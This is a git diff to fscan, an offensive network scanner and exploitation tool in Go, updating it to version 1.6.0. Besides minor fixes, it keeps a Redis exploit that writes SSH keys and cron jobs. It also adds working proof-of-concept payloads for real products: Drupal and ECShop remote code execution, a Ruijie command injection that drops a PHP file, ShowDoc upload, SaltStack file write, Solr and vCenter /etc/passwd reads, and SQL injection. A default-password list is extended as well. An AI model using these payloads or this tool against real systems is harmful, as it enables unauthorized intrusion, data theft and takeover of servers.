diff --git a/Plugins/NetBIOS.go b/Plugins/NetBIOS.go index f34ac73..3e53738 100644 --- a/Plugins/NetBIOS.go +++ b/Plugins/NetBIOS.go @@ -137,6 +137,9 @@ func NetBIOS1(info *common.HostInfo) (nbname NbnsName, err error) { nbname.msg += "-------------------------------------------\n" nbname.msg += msg1 + "\n" start := bytes.Index(ret, []byte("NTLMSSP")) + if len(ret) < start+45 { + return + } num1, err = bytetoint(ret[start+40 : start+41][0]) if err != nil { return @@ -151,7 +154,7 @@ func NetBIOS1(info *common.HostInfo) (nbname NbnsName, err error) { return } offset, err := bytetoint(ret[start+44 : start+45][0]) - if err != nil { + if err != nil || len(ret) < start+offset+length { return } index := start + offset @@ -211,13 +214,16 @@ func GetNbnsname(info *common.HostInfo) (nbname NbnsName, err error) { data := text[57:] var msg string for i := 0; i < num; i++ { + if len(data) < 18*i+16 { + break + } name := string(data[18*i : 18*i+15]) flag_bit := data[18*i+15 : 18*i+16] if GROUP_NAMES[string(flag_bit)] != "" && string(flag_bit) != "\x00" { msg += fmt.Sprintf("%s G %s\n", name, GROUP_NAMES[string(flag_bit)]) } else if UNIQUE_NAMES[string(flag_bit)] != "" && string(flag_bit) != "\x00" { msg += fmt.Sprintf("%s U %s\n", name, UNIQUE_NAMES[string(flag_bit)]) - } else if string(flag_bit) == "\x00" { + } else if string(flag_bit) == "\x00" || len(data) >= 18*i+18 { name_flags := data[18*i+16 : 18*i+18][0] if name_flags >= 128 { nbname.group = strings.Replace(name, " ", "", -1) diff --git a/Plugins/base.go b/Plugins/base.go index eff4b62..c2848e9 100644 --- a/Plugins/base.go +++ b/Plugins/base.go @@ -1,16 +1,16 @@ package Plugins var PluginList = map[string]interface{}{ - "21": FtpScan, - "22": SshScan, - "135": Findnet, - "139": NetBIOS, - "445": SmbScan, - "1433": MssqlScan, - "3306": MysqlScan, - "5432": PostgresScan, - "6379": RedisScan, - "9200": elasticsearchScan, + "21": FtpScan, + "22": SshScan, + "135": Findnet, + "139": NetBIOS, + "445": SmbScan, + "1433": MssqlScan, + "3306": MysqlScan, + "5432": PostgresScan, + "6379": RedisScan, + //"9200": elasticsearchScan, "11211": MemcachedScan, "27017": MongodbScan, "1000001": MS17010, diff --git a/Plugins/portscan.go b/Plugins/portscan.go index 1b53338..93ddbc4 100644 --- a/Plugins/portscan.go +++ b/Plugins/portscan.go @@ -17,6 +17,22 @@ type Addr struct { func PortScan(hostslist []string, ports string, timeout int64) []string { var AliveAddress []string probePorts := common.ParsePort(ports) + noPorts := common.ParsePort(common.NoPorts) + if len(noPorts) > 0 { + tmp := make(map[int]struct{}) + var tmpPorts []int + for _, port := range probePorts { + for _, noport := range noPorts { + if port != noport { + if _, ok := tmp[port]; !ok { + tmp[port] = struct{}{} + tmpPorts = append(tmpPorts, port) + } + } + } + } + probePorts = tmpPorts + } workers := common.Threads Addrs := make(chan Addr) results := make(chan string) diff --git a/Plugins/redis.go b/Plugins/redis.go index 849bbd4..6bbeecd 100644 --- a/Plugins/redis.go +++ b/Plugins/redis.go @@ -96,15 +96,16 @@ func Expoilt(realhost string, conn net.Conn) error { return err } if flagSsh == true { - result := fmt.Sprintf("Redis:%v like can write /root/.ssh/", realhost) + result := fmt.Sprintf("[+] Redis:%v like can write /root/.ssh/", realhost) common.LogSuccess(result) if common.RedisFile != "" { writeok, text, err := writekey(conn, common.RedisFile) if err != nil { + fmt.Println(fmt.Sprintf("[-] %v SSH write key errer: %v", realhost, text)) return err } if writeok { - result := fmt.Sprintf("%v SSH public key was written successfully", realhost) + result := fmt.Sprintf("[+] %v SSH public key was written successfully", realhost) common.LogSuccess(result) } else { fmt.Println("Redis:", realhost, "SSHPUB write failed", text) @@ -113,7 +114,7 @@ func Expoilt(realhost string, conn net.Conn) error { } if flagCron == true { - result := fmt.Sprintf("Redis:%v like can write /var/spool/cron/", realhost) + result := fmt.Sprintf("[+] Redis:%v like can write /var/spool/cron/", realhost) common.LogSuccess(result) if common.RedisShell != "" { writeok, text, err := writecron(conn, common.RedisShell) @@ -121,10 +122,10 @@ func Expoilt(realhost string, conn net.Conn) error { return err } if writeok { - result := fmt.Sprintf("%v /var/spool/cron/root was written successfully", realhost) + result := fmt.Sprintf("[+] %v /var/spool/cron/root was written successfully", realhost) common.LogSuccess(result) } else { - fmt.Println("Redis:", realhost, "cron write failed", text) + fmt.Println("[-] Redis:", realhost, "cron write failed", text) } } } diff --git a/Plugins/scanner.go b/Plugins/scanner.go index 48faa69..4250899 100644 --- a/Plugins/scanner.go +++ b/Plugins/scanner.go @@ -26,6 +26,7 @@ func Scan(info common.HostInfo) { return } AlivePorts := PortScan(Hosts, info.Ports, info.Timeout) + fmt.Println("alive ports len is:", len(AlivePorts)) if info.Scantype == "portscan" { return } @@ -64,7 +65,7 @@ func Scan(info common.HostInfo) { } } wg.Wait() - common.Logwg.Wait() + common.LogWG.Wait() close(common.Results) fmt.Println(fmt.Sprintf("已完成 %v/%v", common.End, common.Num)) } diff --git a/Plugins/ssh.go b/Plugins/ssh.go index a0777de..5f74a53 100644 --- a/Plugins/ssh.go +++ b/Plugins/ssh.go @@ -56,7 +56,7 @@ func SshConn(info *common.HostInfo, user string, pass string) (flag bool, err er flag = true if info.Command != "" { combo, _ := session.CombinedOutput(info.Command) - result := fmt.Sprintf("SSH:%v:%v:%v %v \n %v", Host, Port, Username, Password, string(combo)) + result := fmt.Sprintf("[+] SSH:%v:%v:%v %v \n %v", Host, Port, Username, Password, string(combo)) common.LogSuccess(result) } else { result := fmt.Sprintf("[+] SSH:%v:%v:%v %v", Host, Port, Username, Password) diff --git a/Plugins/webtitle.go b/Plugins/webtitle.go index bc61d95..c1d7e9f 100644 --- a/Plugins/webtitle.go +++ b/Plugins/webtitle.go @@ -6,6 +6,7 @@ import ( "github.com/shadow1ng/fscan/WebScan" "github.com/shadow1ng/fscan/WebScan/lib" "github.com/shadow1ng/fscan/common" + "golang.org/x/net/html/charset" "golang.org/x/text/encoding/simplifiedchinese" "golang.org/x/text/transform" "io/ioutil" @@ -113,7 +114,6 @@ func geturl(info *common.HostInfo, flag int, CheckData []WebScan.CheckDatas) (er res.Header.Set("User-agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36") res.Header.Set("Accept", "*/*") res.Header.Set("Accept-Language", "zh-CN,zh;q=0.9") - res.Header.Set("Accept-Encoding", "gzip, deflate") if common.Pocinfo.Cookie != "" { res.Header.Set("Cookie", "rememberMe=1;"+common.Pocinfo.Cookie) } else { @@ -167,7 +167,8 @@ func geturl(info *common.HostInfo, flag int, CheckData []WebScan.CheckDatas) (er return "" } encoding := GetEncoding() - if encoding == "gbk" || encoding == "gb2312" { + _, charsetName, _ := charset.DetermineEncoding(body, "") + if encoding == "gbk" || encoding == "gb2312" || charsetName == "gbk" { titleGBK, err := Decodegbk(text) if err == nil { title = string(titleGBK) diff --git a/WebScan/info/rules.go b/WebScan/info/rules.go index 3112cde..bd6c638 100644 --- a/WebScan/info/rules.go +++ b/WebScan/info/rules.go @@ -62,8 +62,8 @@ var RuleDatas = []RuleData{ {"Citrix-Access-Gateway", "code", "(Citrix Access Gateway)"}, {"华为 MCU", "code", "(McuR5-min.js)"}, {"TP-LINK Wireless WDR3600", "code", "(TP-LINK Wireless WDR3600)"}, - {"泛微协同办公OA", "headers", "(ecology_JSessionid)"}, - {"泛微协同办公OA", "code", "(/spa/portal/public/index.js)"}, + {"泛微OA", "headers", "(ecology_JSessionid)"}, + {"泛微OA", "code", "(/spa/portal/public/index.js)"}, {"华为_HUAWEI_ASG2050", "code", "(HUAWEI ASG2050)"}, {"360网站卫士", "code", "(360wzb)"}, {"Citrix-XenServer", "code", "(Citrix Systems, Inc. XenServer)"}, @@ -124,6 +124,8 @@ var RuleDatas = []RuleData{ {"大汉版通发布系统", "code", "(大汉版通发布系统|大汉网络)"}, {"druid", "code", "(druid.index|DruidDrivers|DruidVersion|Druid Stat Index)"}, {"Jenkins", "code", "(Jenkins)"}, + {"红帆OA", "code", "(iOffice)"}, + {"VMware vSphere", "code", "(VMware vSphere)"}, } var Md5Datas = []Md5Data{ diff --git a/WebScan/lib/check.go b/WebScan/lib/check.go index 51d6df2..a8b578a 100644 --- a/WebScan/lib/check.go +++ b/WebScan/lib/check.go @@ -67,7 +67,7 @@ func executePoc(oReq *http.Request, p *Poc) (bool, error) { } env, err := NewEnv(&c) if err != nil { - //fmt.Println("environment creation error: %s\n", err) + //fmt.Printf("environment creation error: %s\n", err) return false, err } req, err := ParseRequest(oReq) diff --git a/WebScan/lib/eval.go b/WebScan/lib/eval.go index cb1a7ea..c723544 100644 --- a/WebScan/lib/eval.go +++ b/WebScan/lib/eval.go @@ -26,19 +26,19 @@ func NewEnv(c *CustomLib) (*cel.Env, error) { func Evaluate(env *cel.Env, expression string, params map[string]interface{}) (ref.Val, error) { ast, iss := env.Compile(expression) if iss.Err() != nil { - //fmt.Println("compile: ", iss.Err()) + //fmt.Printf("compile: ", iss.Err()) return nil, iss.Err() } prg, err := env.Program(ast) if err != nil { - //fmt.Println("Program creation error: %v", err) + //fmt.Printf("Program creation error: %v", err) return nil, err } out, _, err := prg.Eval(params) if err != nil { - //fmt.Println("Evaluation error: %v", err) + //fmt.Printf("Evaluation error: %v", err) return nil, err } return out, nil diff --git a/WebScan/lib/http.go b/WebScan/lib/http.go index 2b38559..23a81d5 100644 --- a/WebScan/lib/http.go +++ b/WebScan/lib/http.go @@ -10,6 +10,7 @@ import ( "net/http" "net/url" "strconv" + "strings" "time" ) @@ -39,6 +40,8 @@ func InitHttpClient(ThreadsNum int, DownProxy string, Timeout time.Duration) err if DownProxy != "" { if DownProxy == "1" { DownProxy = "http://127.0.0.1:8080" + } else if !strings.Contains(DownProxy, "://") { + DownProxy = "http://127.0.0.1:" + DownProxy } u, err := url.Parse(DownProxy) if err != nil { diff --git a/WebScan/pocs/dlink-cve-2020-25078-account-disclosure.yml b/WebScan/pocs/dlink-cve-2020-25078-account-disclosure.yml new file mode 100644 index 0000000..7fa21e7 --- /dev/null +++ b/WebScan/pocs/dlink-cve-2020-25078-account-disclosure.yml @@ -0,0 +1,12 @@ +name: poc-yaml-dlink-cve-2020-25078-account-disclosure +rules: + - method: GET + path: >- + /config/getuser?index=0 + follow_redirects: false + expression: | + response.status == 200 && response.body.bcontains(b"name=admin") && response.body.bcontains(b"pass=") && response.headers["Content-Type"].contains("text/plain") +detail: + author: kzaopa(https://github.com/kzaopa) + links: + - https://mp.weixin.qq.com/s/b7jyA5sylkDNauQbwZKvBg \ No newline at end of file diff --git a/WebScan/pocs/drupal-cve-2018-7600-rce2.yml b/WebScan/pocs/drupal-cve-2018-7600-rce2.yml new file mode 100644 index 0000000..9e723bb --- /dev/null +++ b/WebScan/pocs/drupal-cve-2018-7600-rce2.yml @@ -0,0 +1,29 @@ +name: poc-yaml-drupal-cve-2018-7600-rce +set: + r1: randomLowercase(4) + r2: randomLowercase(4) +rules: + - method: POST + path: "/?q=user/password&name[%23post_render][]=printf&name[%23type]=markup&name[%23markup]={{r1}}%25%25{{r2}}" + headers: + Content-Type: application/x-www-form-urlencoded + body: | + form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail+new+Password + search: | + name="form_build_id"\s+value="(?P.+?)" + expression: | + response.status == 200 + - method: POST + path: "/?q=file%2Fajax%2Fname%2F%23value%2F{{build_id}}" + headers: + Content-Type: application/x-www-form-urlencoded + body: | + form_build_id={{build_id}} + expression: | + response.body.bcontains(bytes(r1 + "%" + r2)) +detail: + links: + - https://github.com/dreadlocked/Drupalgeddon2 + - https://paper.seebug.org/567/ +test: + target: http://cve-2018-7600-8-x.vulnet:8080/ diff --git a/WebScan/pocs/ecshop-rce2.yml b/WebScan/pocs/ecshop-rce2.yml new file mode 100644 index 0000000..c79f02c --- /dev/null +++ b/WebScan/pocs/ecshop-rce2.yml @@ -0,0 +1,17 @@ +name: poc-yaml-ecshop-rce +set: + r1: randomInt(40000, 44800) + r2: randomInt(40000, 44800) +rules: + - method: POST + path: /user.php + headers: + Referer: >- + 45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:193:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b6576616c09286261736536345f6465636f64650928275a585a686243676b5831425055315262634841784d6a4e644b54733d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953aads + Content-Type: application/x-www-form-urlencoded + body: action=login&pp123=printf({{r1}}*{{r2}}); + expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) +detail: + author: 凉风(http://webkiller.cn/) + links: + - https://github.com/vulhub/vulhub/blob/master/ecshop/xianzhi-2017-02-82239600/README.zh-cn.md \ No newline at end of file diff --git a/WebScan/pocs/jumpserver-unauth-rce2.yml b/WebScan/pocs/jumpserver-unauth-rce2.yml new file mode 100644 index 0000000..34bb49e --- /dev/null +++ b/WebScan/pocs/jumpserver-unauth-rce2.yml @@ -0,0 +1,21 @@ +name: poc-yaml-jumpserver-unauth-rce +set: + r1: randomLowercase(5) +rules: + - method: GET + path: /api/v1/users/connection-token/ + follow_redirects: false + expression: | + response.status == 401 && response.content_type.contains("application/json") && response.body.bcontains(b"not_authenticated") + - method: GET + path: /api/v1/users/connection-token/?user-only={{r1}} + follow_redirects: false + expression: | + response.status == 404 && response.content_type.contains("application/json") && response.body.bcontains(b"\"\"") +detail: + author: mvhz81 + info: jumpserver unauth read logfile + jumpserver rce + links: + - https://s.tencent.com/research/bsafe/1228.html + - https://mp.weixin.qq.com/s/KGRU47o7JtbgOC9xwLJARw + - https://github.com/jumpserver/jumpserver/releases/download/v2.6.2/jms_bug_check.sh diff --git a/WebScan/pocs/kingsoft-v8-file-read.yml b/WebScan/pocs/kingsoft-v8-file-read.yml new file mode 100644 index 0000000..02b3eb0 --- /dev/null +++ b/WebScan/pocs/kingsoft-v8-file-read.yml @@ -0,0 +1,12 @@ +name: poc-yaml-kingsoft-v8-file-read +rules: + - method: GET + path: >- + /htmltopdf/downfile.php?filename=/windows/win.ini + follow_redirects: false + expression: | + response.status == 200 && (response.body.bcontains(b"for 16-bit app support") || response.body.bcontains(b"[extensions]")) && response.headers["Content-Type"].contains("application/zip") +detail: + author: kzaopa(https://github.com/kzaopa) + links: + - https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/b6f8fbfef46ad1c3f8d5715dd19b00ca875341c2/_book/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E9%87%91%E5%B1%B1/%E9%87%91%E5%B1%B1%20V8%20%E7%BB%88%E7%AB%AF%E5%AE%89%E5%85%A8%E7%B3%BB%E7%BB%9F%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md diff --git a/WebScan/pocs/ruijie-eg-rce.yml b/WebScan/pocs/ruijie-eg-rce.yml new file mode 100644 index 0000000..2aac600 --- /dev/null +++ b/WebScan/pocs/ruijie-eg-rce.yml @@ -0,0 +1,29 @@ +name: poc-yaml-ruijie-eg-rce +set: + r1: randomLowercase(4) + r2: randomLowercase(4) + phpcode: > + "" + payload: base64(phpcode) +rules: + - method: POST + path: "/guest_auth/guestIsUp.php" + headers: + User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36" + Accept-Encoding: "gzip, deflate" + Content-Type: "application/x-www-form-urlencoded; charset=UTF-8" + body: | + ip=127.0.0.1|echo '{{payload}}' | base64 -d > {{r2}}.php&mac=00-00 + expression: | + response.status == 200 + - method: GET + path: "/guest_auth/{{r2}}.php" + headers: + User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36" + Accept-Encoding: "gzip, deflate" + expression: | + response.body.bcontains(bytes(r1)) +detail: + author: White(https://github.com/WhiteHSBG) + links: + - https://xz.aliyun.com/t/9016?page=1 \ No newline at end of file diff --git a/WebScan/pocs/saltstack-cve-2021-25282-file-write.yml b/WebScan/pocs/saltstack-cve-2021-25282-file-write.yml new file mode 100644 index 0000000..63f6a1b --- /dev/null +++ b/WebScan/pocs/saltstack-cve-2021-25282-file-write.yml @@ -0,0 +1,22 @@ +name: poc-yaml-saltstack-cve-2021-25282-file-write +set: + r1: randomLowercase(5) +rules: + - method: GET + path: /run + follow_redirects: false + expression: | + response.status == 200 && response.content_type.icontains("application/json") && response.body.bcontains(b"wheel_async") && response.body.bcontains(b"runner_async") + - method: POST + path: /run + headers: + Content-type: application/json + body: >- + {"eauth":"auto","client":"wheel_async","fun":"pillar_roots.write","data":"{{r1}}","path":"../../../../../../../../../tmp/{{r1}}"} + follow_redirects: false + expression: | + response.status == 200 && response.content_type.icontains("application/json") && "salt/wheel/d*".bmatches(response.body) +detail: + author: jweny(https://github.com/jweny) + links: + - https://www.anquanke.com/post/id/232748 \ No newline at end of file diff --git a/WebScan/pocs/seeyon-a6-employee-info-leak.yml b/WebScan/pocs/seeyon-a6-employee-info-leak.yml new file mode 100644 index 0000000..b655ab7 --- /dev/null +++ b/WebScan/pocs/seeyon-a6-employee-info-leak.yml @@ -0,0 +1,11 @@ +name: poc-yaml-seeyon-a6-employee-info-leak +rules: + - method: GET + path: /yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0 + expression: + response.status == 200 && response.body.bcontains(b"[Content_Types].xml") && response.body.bcontains(b"Excel.Sheet") +detail: + author: sakura404x + version: 致远A6 + links: + - https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3351.md \ No newline at end of file diff --git a/WebScan/pocs/showdoc-uploadfile.yml b/WebScan/pocs/showdoc-uploadfile.yml new file mode 100644 index 0000000..0921919 --- /dev/null +++ b/WebScan/pocs/showdoc-uploadfile.yml @@ -0,0 +1,25 @@ +name: poc-yaml-showdoc-uploadfile +set: + r1: randomLowercase(4) + r2: randomLowercase(4) +rules: + - method: POST + path: /index.php?s=/home/page/uploadImg + headers: + Content-Type: "multipart/form-data; boundary=--------------------------835846770881083140190633" + follow_redirects: false + body: "----------------------------835846770881083140190633\nContent-Disposition: form-data; name=\"editormd-image-file\"; filename=\"{{r1}}.<>php\"\nContent-Type: text/plain\n\n\n----------------------------835846770881083140190633--" + expression: | + response.status == 200 && response.body.bcontains(b"success") + search: | + (?P\d{4}-\d{2}-\d{2})\\/(?P[a-f0-9]+\.php) + - method: GET + path: /Public/Uploads/{{date}}/{{file}} + follow_redirects: false + expression: | + response.status == 200 && response.body.bcontains(bytes(r2)) +detail: + author: White(https://github.com/WhiteHSBG) + Affected Version: "showdoc <= 2.8.6" + links: + - https://github.com/star7th/showdoc/pull/1059 \ No newline at end of file diff --git a/WebScan/pocs/solr-fileread1.yml b/WebScan/pocs/solr-fileread1.yml new file mode 100644 index 0000000..0b92afd --- /dev/null +++ b/WebScan/pocs/solr-fileread1.yml @@ -0,0 +1,25 @@ +name: poc-yaml-solr-fileread1 +rules: + - method: GET + path: "/solr/admin/cores?indexInfo=false&wt=json" + expression: response.status == 200 && response.body.bcontains(b"responseHeader") + search: >- + "name":"(?P.+?)" + - method: POST + path: "/solr/{{core}}/config" + body: | + {"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}} + expression: | + response.body.bcontains(b"responseHeader") + - method: POST + path: "/solr/{{core}}/debug/dump?param=ContentStreams" + headers: + Content-Type: application/x-www-form-urlencoded + body: | + stream.url=file:///etc/passwd + expression: | + response.status == 200 && r'root:[x*]:0:0:'.bmatches(response.body) +detail: + author: whami-root(https://github.com/whami-root) + links: + - https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247484117&idx=1&sn=2fdab8cbe4b873f8dd8abb35d935d186 \ No newline at end of file diff --git a/WebScan/pocs/solr-fileread2.yml b/WebScan/pocs/solr-fileread2.yml new file mode 100644 index 0000000..60def9e --- /dev/null +++ b/WebScan/pocs/solr-fileread2.yml @@ -0,0 +1,25 @@ +name: poc-yaml-solr-fileread2 +rules: + - method: GET + path: "/solr/admin/cores?indexInfo=false&wt=json" + expression: "true" + search: >- + "name":"(?P.+?)" + - method: POST + path: "/solr/{{core}}/config" + body: | + {"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}} + expression: | + response.body.bcontains(b"responseHeader") + - method: POST + path: "/solr/{{core}}/debug/dump?param=ContentStreams" + headers: + Content-Type: application/x-www-form-urlencoded + body: | + stream.url=file:///c://windows/win.ini + expression: | + response.status == 200 && response.body.bcontains(b"for 16-bit app support") +detail: + author: whami-root(https://github.com/whami-root) + links: + - https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247484117&idx=1&sn=2fdab8cbe4b873f8dd8abb35d935d186 \ No newline at end of file diff --git a/WebScan/pocs/springboot-env-unauth2.yml b/WebScan/pocs/springboot-env-unauth2.yml new file mode 100644 index 0000000..6a78661 --- /dev/null +++ b/WebScan/pocs/springboot-env-unauth2.yml @@ -0,0 +1,9 @@ +name: poc-yaml-springboot-env-unauth +rules: + - method: GET + path: /actuator/env + expression: | + response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"java.version") && response.body.bcontains(b"os.arch") +detail: + links: + - https://github.com/LandGrey/SpringBootVulExploit diff --git a/WebScan/pocs/tongda-user-session-disclosure.yml b/WebScan/pocs/tongda-user-session-disclosure.yml new file mode 100644 index 0000000..05768d9 --- /dev/null +++ b/WebScan/pocs/tongda-user-session-disclosure.yml @@ -0,0 +1,16 @@ +name: poc-yaml-tongda-user-session-disclosure +rules: + - method: GET + path: /mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0 + follow_redirects: false + expression: "true" + + - method: POST + path: /general/userinfo.php?UID=1 + follow_redirects: false + expression: | + response.status == 200 && response.body.bcontains(b"\"dept_name\":\"") && response.body.bcontains(b"\"online_flag\":") && response.headers["Content-Type"].contains("application/json") +detail: + author: kzaopa(https://github.com/kzaopa) + links: + - https://mp.weixin.qq.com/s/llyGEBRo0t-C7xOLMDYfFQ \ No newline at end of file diff --git a/WebScan/pocs/vmware-vcenter-arbitrary-file-read2.yml b/WebScan/pocs/vmware-vcenter-arbitrary-file-read2.yml new file mode 100644 index 0000000..064aa10 --- /dev/null +++ b/WebScan/pocs/vmware-vcenter-arbitrary-file-read2.yml @@ -0,0 +1,11 @@ +name: poc-yaml-vmware-vcenter-arbitrary-file-read2 +rules: + - method: GET + path: /eam/vib?id=/etc/passwd + follow_redirects: false + expression: | + response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) +detail: + author: MrP01ntSun(https://github.com/MrPointSun) + links: + - https://t.co/LfvbyBUhF5 diff --git a/WebScan/pocs/vmware-vrealize-cve-2021-21975-ssrf.yml b/WebScan/pocs/vmware-vrealize-cve-2021-21975-ssrf.yml new file mode 100644 index 0000000..6b27d65 --- /dev/null +++ b/WebScan/pocs/vmware-vrealize-cve-2021-21975-ssrf.yml @@ -0,0 +1,15 @@ +name: poc-yaml-vmware-vrealize-cve-2021-21975-ssrf +rules: + - method: POST + path: /casa/nodes/thumbprints + headers: + Content-Type: application/json + body: | + ["127.0.0.1:443/ui/"] + follow_redirects: true + expression: | + response.status == 200 && response.body.bcontains(bytes("vRealize Operations Manager")) +detail: + author: Loneyer + links: + - https://www.vmware.com/security/advisories/VMSA-2021-0004.html \ No newline at end of file diff --git a/WebScan/pocs/yongyou-u8-oa-sqli.yml b/WebScan/pocs/yongyou-u8-oa-sqli.yml new file mode 100644 index 0000000..cfe638d --- /dev/null +++ b/WebScan/pocs/yongyou-u8-oa-sqli.yml @@ -0,0 +1,13 @@ +name: poc-yaml-yongyou-u8-oa-sqli +set: + rand: randomInt(200000000, 220000000) +rules: + - method: GET + path: /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{rand}})) + follow_redirects: false + expression: | + response.status == 200 && response.body.bcontains(bytes(md5(string(rand)))) +detail: + author: kzaopa(https://github.com/kzaopa) + links: + - http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20U8%20OA%20test.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html diff --git a/common/config.go b/common/config.go index 0dd05c3..fc77632 100644 --- a/common/config.go +++ b/common/config.go @@ -10,7 +10,7 @@ var Userdict = map[string][]string{ "mongodb": {"root", "admin"}, } -var Passwords = []string{"123456", "admin", "admin123", "root", "", "pass123", "pass@123", "password", "123123", "654321", "111111", "123", "1", "admin@123", "Admin@123", "admin123!@#", "{user}", "{user}1", "{user}111", "{user}123", "{user}@123", "{user}_123", "{user}#123", "{user}@111", "{user}@2019", "P@ssw0rd!", "P@ssw0rd", "Passw0rd", "qwe123", "12345678", "test", "test123", "123qwe!@#", "123456789", "123321", "666666", "a123456.", "123456~a", "000000", "1234567890", "8888888", "!QAZ2wsx", "1qaz2wsx", "abc123", "abc123456", "1qaz@WSX", "a11111", "a12345", "Aa1234", "Aa1234.", "Aa12345", "a123456", "a123123", "Aa123123", "Aa123456", "Aa12345.", "sysadmin", "system", "huawei"} +var Passwords = []string{"123456", "admin", "admin123", "root", "", "pass123", "pass@123", "password", "123123", "654321", "111111", "123", "1", "admin@123", "Admin@123", "admin123!@#", "{user}", "{user}1", "{user}111", "{user}123", "{user}@123", "{user}_123", "{user}#123", "{user}@111", "{user}@2019", "P@ssw0rd!", "P@ssword", "p@ssword", "P@ssw0rd", "Passw0rd", "qwe123", "12345678", "test", "test123", "123qwe!@#", "123456789", "123321", "666666", "a123456.", "123456~a", "000000", "1234567890", "8888888", "!QAZ2wsx", "1qaz2wsx", "abc123", "abc123456", "1qaz@WSX", "a11111", "a12345", "Aa1234", "Aa1234.", "Aa12345", "a123456", "a123123", "Aa123123", "Aa123456", "Aa12345.", "sysadmin", "system", "huawei"} var PORTList = map[string]int{ "ftp": 21, @@ -25,13 +25,13 @@ var PORTList = map[string]int{ "ms17010": 1000001, "cve20200796": 1000002, "web": 1000003, - "elastic": 9200, - "findnet": 135, - "netbios": 139, - "all": 0, - "portscan": 0, - "icmp": 0, - "main": 0, + //"elastic": 9200, + "findnet": 135, + "netbios": 139, + "all": 0, + "portscan": 0, + "icmp": 0, + "main": 0, } var Outputfile = getpath() + "result.txt" @@ -69,18 +69,21 @@ type PocInfo struct { CeyeDomain string } -var TmpOutputfile string -var TmpSave bool -var IsPing bool -var Ping bool -var Pocinfo PocInfo -var IsWebCan bool -var RedisFile string -var RedisShell string -var Userfile string -var Passfile string -var HostFile string -var Threads int -var URL string -var UrlFile string -var Urls []string +var ( + TmpOutputfile string + TmpSave bool + IsPing bool + Ping bool + Pocinfo PocInfo + IsWebCan bool + RedisFile string + RedisShell string + Userfile string + Passfile string + HostFile string + Threads int + URL string + UrlFile string + Urls []string + NoPorts string +) diff --git a/common/flag.go b/common/flag.go index aca9759..730fb30 100644 --- a/common/flag.go +++ b/common/flag.go @@ -11,7 +11,7 @@ func Banner() { / /_\/____/ __|/ __| '__/ _` + "`" + ` |/ __| |/ / / /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ - fscan version: 1.5.1.2 + fscan version: 1.6.0 ` print(banner) } @@ -20,6 +20,7 @@ func Flag(Info *HostInfo) { Banner() flag.StringVar(&Info.Host, "h", "", "IP address of the host you want to scan,for example: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12") flag.StringVar(&Info.Ports, "p", DefaultPorts, "Select a port,for example: 22 | 1-65535 | 22,80,3306") + flag.StringVar(&NoPorts, "pn", "", "the ports no scan,as: -pn 445") flag.StringVar(&Info.Command, "c", "", "exec command (ssh)") flag.StringVar(&Info.Domain, "domain", "", "smb domain") flag.StringVar(&Info.Username, "user", "", "username") @@ -44,6 +45,6 @@ func Flag(Info *HostInfo) { flag.StringVar(&Pocinfo.Proxy, "proxy", "", "set poc proxy, -proxy http://127.0.0.1:8080") flag.StringVar(&Pocinfo.Cookie, "cookie", "", "set poc cookie") flag.Int64Var(&Pocinfo.Timeout, "wt", 5, "Set web timeout") - flag.IntVar(&Pocinfo.Num, "Num", 20, "poc rate") + flag.IntVar(&Pocinfo.Num, "num", 20, "poc rate") flag.Parse() } diff --git a/common/log.go b/common/log.go index 44cf509..6bf1000 100644 --- a/common/log.go +++ b/common/log.go @@ -15,10 +15,10 @@ var Start = true var LogSucTime int64 var LogErrTime int64 var WaitTime int64 -var Logwg sync.WaitGroup +var LogWG sync.WaitGroup func LogSuccess(result string) { - Logwg.Add(1) + LogWG.Add(1) LogSucTime = time.Now().Unix() if Start { go SaveLog() @@ -33,7 +33,7 @@ func SaveLog() { if IsSave { WriteFile(result, Outputfile) } - Logwg.Done() + LogWG.Done() } } diff --git a/go.mod b/go.mod index 3b1902d..0970ace 100644 --- a/go.mod +++ b/go.mod @@ -5,14 +5,14 @@ go 1.16 require ( github.com/denisenkom/go-mssqldb v0.10.0 github.com/go-sql-driver/mysql v1.6.0 - github.com/golang/protobuf v1.5.2 - github.com/google/cel-go v0.7.3 + github.com/golang/protobuf v1.3.4 + github.com/google/cel-go v0.6.0 github.com/jlaffaye/ftp v0.0.0-20210307004419-5d4190119067 - github.com/lib/pq v1.10.0 + github.com/lib/pq v1.10.1 github.com/stacktitan/smb v0.0.0-20190531122847-da9a425dceb8 - 